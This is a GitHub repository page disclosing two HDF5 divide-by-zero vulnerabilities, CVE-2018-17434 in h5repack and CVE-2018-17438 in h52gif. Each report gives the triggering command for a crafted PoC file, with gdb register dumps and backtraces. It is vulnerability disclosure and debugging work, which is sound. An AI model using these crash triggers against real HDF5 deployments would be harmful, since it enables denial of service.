Skip to content
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
covering360/HDF5/vuln4/

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 
Description

HDF5 is a data model, library, and file format for storing and managing data. It supports an unlimited variety of datatypes, and is designed for flexible and efficient I/O and for high volume and complex data. HDF5 is portable and is extensible, allowing applications to evolve in their use of HDF5. The HDF5 Technology suite includes tools and applications for managing, manipulating, viewing, and analyzing data in the HDF5 format. link: https://portal.hdfgroup.org/display/HDF5/HDF5

Divided By Zero - POC_apply_filters_h5repack_filters (CVE-2018-17434)

A SIGFPE signal is raised in the function apply_filters() of h5repack_filters.c in the 'hdf5' package 1.10.x and 1.8.x versions during an attempted parse of a crafted HDF file, because of incorrect protection against division by zero. It could allow a remote denial of service attack.

We believe that vulnerability has been introduced in the commit "0b4b87e36ff3ee8a6b1c24733a5b24b7b9112a1f"

Affected version - 1.10.x and 1.8.x and before (compiled from source)

Tested versions - 1.8.20 & 1.10.3

Command: ./h5repack -f GZIP=8 -l dset1:CHUNK=5x6 $POC ~/output/test11.h5
Debugging
Source: 

    335	             for (i = rank; i > 0; --i) {
 →  336	                 hsize_t size = H5TOOLS_BUFSIZE / sm_nbytes;
    337	                 if (size == 0) /* datum size > H5TOOLS_BUFSIZE */
    338	                     size = 1;
    339	                 sm_size[i - 1] = MIN(dims[i - 1], size);
    340	                 sm_nbytes *= sm_size[i - 1];
    341	                 HDassert(sm_nbytes > 0);

gef➤ x/i $pc
=> 0x55555556393c <apply_filters+1129>:	div    QWORD PTR [rbp-0xbd0]

gef➤  i r
rax            0x2000000	0x2000000
rbx            0x0	0x0
rcx            0x11	0x11
rdx            0x0	0x0
rsi            0x55555579b900	0x55555579b900
rdi            0x0	0x0
rbp            0x7fffffffd5a0	0x7fffffffd5a0
rsp            0x7fffffffc970	0x7fffffffc970
r8             0xfcffffc0	0xfcffffc0
r9             0x7fffffffdc80	0x7fffffffdc80
r10            0x5555557a1840	0x5555557a1840
r11            0x7fffffffd1e8	0x7fffffffd1e8
r12            0x55555555a300	0x55555555a300
r13            0x7fffffffe130	0x7fffffffe130
r14            0x0	0x0
r15            0x0	0x0
rip            0x55555556393c	0x55555556393c <apply_filters+1129>
eflags         0x10206	[ PF IF RF ]
cs             0x33	0x33
ss             0x2b	0x2b
ds             0x0	0x0
es             0x0	0x0
fs             0x0	0x0
gs             0x0	0x0

gef➤ x/d $rbp-0xbd0
0x7fffffffc9d0:	0

Backtrace
#0  0x000055555556393c in apply_filters (name=0x5555558dde00 "/dset2", rank=0x12, dims=0x7fffffffd740, msize=0x8, dcpl_id=0xa000014, options=0x7fffffffdc80, has_filter=0x7fffffffd5ec) at h5repack_filters.c:336
#1  0x00005555555602f1 in do_copy_objects (fidin=0x1000000, fidout=0x1000001, travt=0x5555558dd8d0, options=0x7fffffffdc80) at h5repack_copy.c:807
#2  0x000055555555e52e in copy_objects (fnamein=0x7fffffffe4a9 "/home/ethan/hdf5-repack/POC_024", fnameout=0x7fffffffe4d1 "/home/ethan/output/test11.h5", options=0x7fffffffdc80) at h5repack_copy.c:299
#3  0x000055555555a46a in h5repack (infile=0x7fffffffe4a9 "/home/ethan/hdf5-repack/POC_024", outfile=0x7fffffffe4d1 "/home/ethan/output/test11.h5", options=0x7fffffffdc80) at h5repack.c:54
#4  0x000055555556f32d in main (argc=0x7, argv=0x7fffffffe138) at h5repack_main.c:660

==========================================================================================================================

Divided By Zero - POC_H5D__select_io_H5Dselect (CVE-2018-17438)

A SIGFPE signal is raised in the function H5D__select_io() of H5Dselect.c in the 'hdf5' package 1.10.x and 1.8.x versions during an attempted parse of a crafted HDF file, because of incorrect protection against division by zero. It could allow a remote denial of service attack.

Affected version - 1.10.x and 1.8.x and before (compiled from source)

Tested versions - 1.8.20 & 1.10.3

Command: ./h52gif $POC ~/output_h5gif/image1.gif -i image
Debugging
Source: 

	228	             /* Decrement number of elements left to process */
 →  229	             HDassert(((size_t)tmp_file_len % elmt_size) == 0);
    230	             nelmts -= ((size_t)tmp_file_len / elmt_size);
    231	         } /* end while */

gef➤  x/i $pc
=> 0x7ffff5937361 <H5D__select_io+8766>:	div    QWORD PTR [rbp-0x260]

gef➤  i r
rax            0x0	0x0
rbx            0x7fffffffcbf0	0x7fffffffcbf0
rcx            0x1	0x1
rdx            0x0	0x0
rsi            0x6180000008b8	0x6180000008b8
rdi            0x617000000080	0x617000000080
rbp            0x7fffffffcc10	0x7fffffffcc10
rsp            0x7fffffffc990	0x7fffffffc990
r8             0xc307fff8118	0xc307fff8118
r9             0xc307fff8177	0xc307fff8177
r10            0x7fffffffbdf0	0x7fffffffbdf0
r11            0x0	0x0
r12            0xffffffff942	0xffffffff942
r13            0x7fffffffca10	0x7fffffffca10
r14            0x7fffffffca10	0x7fffffffca10
r15            0x7fffffffcd20	0x7fffffffcd20
rip            0x7ffff5937361	0x7ffff5937361 <H5D__select_io+8766>
eflags         0x10246	[ PF ZF IF RF ]
cs             0x33	0x33
ss             0x2b	0x2b
ds             0x0	0x0
es             0x0	0x0
fs             0x0	0x0
gs             0x0	0x0

gef➤  x/d $rbp-0x260
0x7fffffffc9b0:	0

Backtrace
#0  0x00007ffff5937361 in H5D__select_io (io_info=0x7fffffffcf60, elmt_size=0x0, nelmts=0x300, file_space=0x614000001270, mem_space=0x614000001270) at H5Dselect.c:229
#1  0x00007ffff5937e7d in H5D__select_read (io_info=0x7fffffffcf60, type_info=0x7fffffffcec0, nelmts=0x300, file_space=0x614000001270, mem_space=0x614000001270) at H5Dselect.c:281
#2  0x00007ffff5895878 in H5D__contig_read (io_info=0x7fffffffcf60, type_info=0x7fffffffcec0, nelmts=0x300, file_space=0x614000001270, mem_space=0x614000001270, fm=0x61e0000000b0) at H5Dcontig.c:595
#3  0x00007ffff591138c in H5D__read (dataset=0x60b00001e3c0, mem_type_id=0x300000000000148, mem_space=0x614000001270, file_space=0x614000001270, buf=0x617000000080) at H5Dio.c:600
#4  0x00007ffff590bfd0 in H5Dread (dset_id=0x500000000000005, mem_type_id=0x300000000000148, mem_space_id=0x0, file_space_id=0x0, dxpl_id=0xa00000000000008, buf=0x617000000080) at H5Dio.c:198
#5  0x00007ffff6be8bc5 in H5IMget_palette (loc_id=0x100000000000000, image_name=0x602000000010 "image", pal_number=0x0, pal_data=0x617000000080 '\276' <repeats 768 times>) at H5IM.c:1075
#6  0x0000555555566c54 in main (argc=0x5, argv=0x7fffffffe148) at hdf2gif.c:179

=============================================================